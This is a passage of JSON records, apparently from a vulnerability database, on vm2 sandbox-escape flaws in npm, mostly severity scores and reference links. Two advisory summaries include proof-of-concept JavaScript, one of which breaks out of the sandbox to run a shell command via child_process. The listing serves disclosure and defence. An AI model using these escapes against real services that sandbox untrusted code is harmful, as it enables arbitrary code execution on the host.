S:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/issues/363"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/3.9.4","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/3.9.4"},{"reference_url":"https://security.netapp.com/advisory/ntap-20211029-0010","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20211029-0010"},{"reference_url":"https://security.netapp.com/advisory/ntap-20211029-0010/","reference_id":"","reference_type":"","scores":[],"url":"https://security.netapp.com/advisory/ntap-20211029-0010/"},{"reference_url":"https://snyk.io/vuln/SNYK-JS-VM2-1585918","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://snyk.io/vuln/SNYK-JS-VM2-1585918"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23449","reference_id":"CVE-2021-23449","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-23449"},{"reference_url":"https://github.com/advisories/GHSA-rjf2-j2r6-q8gr","reference_id":"GHSA-rjf2-j2r6-q8gr","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rjf2-j2r6-q8gr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/59309?format=json","purl":"pkg:npm/vm2@3.9.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1p1e-z4rv-1bfn"},{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4dwc-b66t-cuf8"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-7k1u-5wfd-sfgn"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hhxv-v932-cuf7"},{"vulnerability":"VCID-jv3n-721k-z3h7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"},{"vulnerability":"VCID-zz97-v3rg-1bck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.4"}],"aliases":["CVE-2021-23449","GHSA-rjf2-j2r6-q8gr"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tux1-cjy7-53bf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/45649?format=json","vulnerability_id":"VCID-v8ca-8eew-aqah","summary":"vm2 Sandbox Escape vulnerability\nIn vm2 for versions up to 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-37903.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-37903.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-37903","reference_id":"","reference_type":"","scores":[{"value":"0.36936","scoring_system":"epss","scoring_elements":"0.97244","published_at":"2026-06-05T12:55:00Z"},{"value":"0.40092","scoring_system":"epss","scoring_elements":"0.97418","published_at":"2026-06-07T12:55:00Z"},{"value":"0.40092","scoring_system":"epss","scoring_elements":"0.97421","published_at":"2026-06-09T12:55:00Z"},{"value":"0.40092","scoring_system":"epss","scoring_elements":"0.9742","published_at":"2026-06-08T12:55:00Z"},{"value":"0.40092","scoring_system":"epss","scoring_elements":"0.97419","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-37903"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://security.netapp.com/advisory/ntap-20230831-0007","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20230831-0007"},{"reference_url":"https://security.netapp.com/advisory/ntap-20241108-0002","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://security.netapp.com/advisory/ntap-20241108-0002"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2224969","reference_id":"2224969","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2224969"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-37903","reference_id":"CVE-2023-37903","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-37903"},{"reference_url":"https://github.com/advisories/GHSA-g644-9gfx-q4q4","reference_id":"GHSA-g644-9gfx-q4q4","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g644-9gfx-q4q4"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-g644-9gfx-q4q4","reference_id":"GHSA-g644-9gfx-q4q4","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-g644-9gfx-q4q4"}],"fixed_packages":[],"aliases":["CVE-2023-37903","GHSA-g644-9gfx-q4q4"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v8ca-8eew-aqah"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/93123?format=json","vulnerability_id":"VCID-wpfa-k33c-zff4","summary":"vm2 has sandbox breakout via `neutralizeArraySpeciesBatch`\n### Summary\n\nVM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.\n\n### Details\n\nThe new method `neutralizeArraySpeciesBatch` works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host `Function` object.\n\n### PoC\n\n```js\nconst {VM} = require(\"vm2\");\nconst vm = new VM();\nconsole.log(vm.run(`\nconst a = [];\nObject.defineProperty(Array.prototype, 0, {\n\tset(value) {\n\t\ta.f = Buffer.prototype.inspect;\n\t\tvalue.arr.f.constructor.constructor(\"return process\")().mainModule.require('child_process').execSync('touch pwned');\n\t}\n});\nnew Buffer(a);\n`));\n```\n\n### Impact\n\nAttackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44008","reference_id":"","reference_type":"","scores":[{"value":"0.00082","scoring_system":"epss","scoring_elements":"0.24093","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00082","scoring_system":"epss","scoring_elements":"0.23969","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00082","scoring_system":"epss","scoring_elements":"0.23964","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00082","scoring_system":"epss","scoring_elements":"0.24021","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00082","scoring_system":"epss","scoring_elements":"0.24075","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44008"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.2"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-9qj6-qjgg-37qq","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-14T18:21:34Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-9qj6-qjgg-37qq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44008","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44008"},{"reference_url":"https://github.com/advisories/GHSA-9qj6-qjgg-37qq","reference_id":"GHSA-9qj6-qjgg-37qq","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9qj6-qjgg-37qq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114480?format=json","purl":"pkg:npm/vm2@3.11.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ue7f-8en8-cufa"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.2"}],"aliases":["CVE-2026-44008","GHSA-9qj6-qjgg-37qq"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wpfa-k33c-zff4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61342?format=json","vulnerability_id":"VCID-ws53-29ft-u7dp","summary":"vm2: vm2: Arbitrary code execution via sandbox breakout through inspect function","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24781.json","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24781.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24781","reference_id":"","reference_type":"","scores":[{"value":"0.00186","scoring_system":"epss","scoring_elements":"0.4019","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00186","scoring_system":"epss","scoring_elements":"0.4023","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00186","scoring_system":"epss","scoring_elements":"0.40233","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00186","scoring_system":"epss","scoring_elements":"0.40204","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00186","scoring_system":"epss","scoring_elements":"0.40176","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24781"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/8d30d93213c1898b3e035298b89a814970dd1189","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T17:13:58Z/"}],"url":"https://github.com/patriksimek/vm2/commit/8d30d93213c1898b3e035298b89a814970dd1189"},{"reference_url":"https://github.com/patriksimek/vm2/commit/bdd3d15e57bc4ec5e70365cd79f7cb0256e5f88c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T17:13:58Z/"}],"url":"https://github.com/patriksimek/vm2/commit/bdd3d15e57bc4ec5e70365cd79f7cb0256e5f88c"},{"reference_url":"https://github.com/patriksimek/vm2/commit/fd266d084e0a3322d0f71ba2a8dc4c96cd030228","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T17:13:58Z/"}],"url":"https://github.com/patriksimek/vm2/commit/fd266d084e0a3322d0f71ba2a8dc4c96cd030228"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T17:13:58Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-v37h-5mfm-c47c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T17:13:58Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-v37h-5mfm-c47c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24781","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24781"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466531","reference_id":"2466531","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466531"},{"reference_url":"https://github.com/advisories/GHSA-v37h-5mfm-c47c","reference_id":"GHSA-v37h-5mfm-c47c","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v37h-5mfm-c47c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-24781","GHSA-v37h-5mfm-c47c"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ws53-29ft-u7dp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61346?format=json","vulnerability_id":"VCID-xe8d-un3q-myc9","summary":"vm2: vm2: Arbitrary code execution due to sandbox breakout","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24118.json","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-24118.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24118","reference_id":"","reference_type":"","scores":[{"value":"0.00176","scoring_system":"epss","scoring_elements":"0.3892","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00176","scoring_system":"epss","scoring_elements":"0.3896","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00176","scoring_system":"epss","scoring_elements":"0.38964","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00176","scoring_system":"epss","scoring_elements":"0.38936","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00176","scoring_system":"epss","scoring_elements":"0.38909","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-24118"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/2b5f3e3a060d9088f5e1cdd585d683d491f990a3","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T18:24:17Z/"}],"url":"https://github.com/patriksimek/vm2/commit/2b5f3e3a060d9088f5e1cdd585d683d491f990a3"},{"reference_url":"https://github.com/patriksimek/vm2/commit/f9b700b1c7d9ef2df416666cb24e0b659140cc74","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T18:24:17Z/"}],"url":"https://github.com/patriksimek/vm2/commit/f9b700b1c7d9ef2df416666cb24e0b659140cc74"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T18:24:17Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.0"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-04T18:24:17Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24118","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24118"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466502","reference_id":"2466502","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2466502"},{"reference_url":"https://github.com/advisories/GHSA-grj5-jjm8-h35p","reference_id":"GHSA-grj5-jjm8-h35p","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-grj5-jjm8-h35p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114499?format=json","purl":"pkg:npm/vm2@3.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.0"}],"aliases":["CVE-2026-24118","GHSA-grj5-jjm8-h35p"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xe8d-un3q-myc9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91965?format=json","vulnerability_id":"VCID-zeup-86es-xkc4","summary":"vm2 has access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`\n### Summary\n\nhttps://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7 is not fully patched.\n\n### Details\n\nIt is still possible to get access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`.\n\n### PoC\n\n```js\nconst {VM} = require(\"vm2\");\nconst vm = new VM();\nconsole.log(vm.run(`\n globalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL']\n`));\n```","references":[{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.2"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-2cm2-m3w5-gp2f","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-2cm2-m3w5-gp2f"},{"reference_url":"https://github.com/advisories/GHSA-2cm2-m3w5-gp2f","reference_id":"GHSA-2cm2-m3w5-gp2f","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2cm2-m3w5-gp2f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114480?format=json","purl":"pkg:npm/vm2@3.11.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ue7f-8en8-cufa"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.11.2"}],"aliases":["GHSA-2cm2-m3w5-gp2f"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zeup-86es-xkc4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/44952?format=json","vulnerability_id":"VCID-zz97-v3rg-1bck","summary":"Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in vm2.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-29199.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-29199.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-29199","reference_id":"","reference_type":"","scores":[{"value":"0.24972","scoring_system":"epss","scoring_elements":"0.96275","published_at":"2026-06-05T12:55:00Z"},{"value":"0.24972","scoring_system":"epss","scoring_elements":"0.96283","published_at":"2026-06-09T12:55:00Z"},{"value":"0.24972","scoring_system":"epss","scoring_elements":"0.96279","published_at":"2026-06-08T12:55:00Z"},{"value":"0.24972","scoring_system":"epss","scoring_elements":"0.96278","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-29199"},{"reference_url":"https://gist.github.com/leesh3288/f05730165799bf56d70391f3d9ea187c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-06T18:44:31Z/"}],"url":"https://gist.github.com/leesh3288/f05730165799bf56d70391f3d9ea187c"},{"reference_url":"https://github.com/patriksimek/vm2","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"gener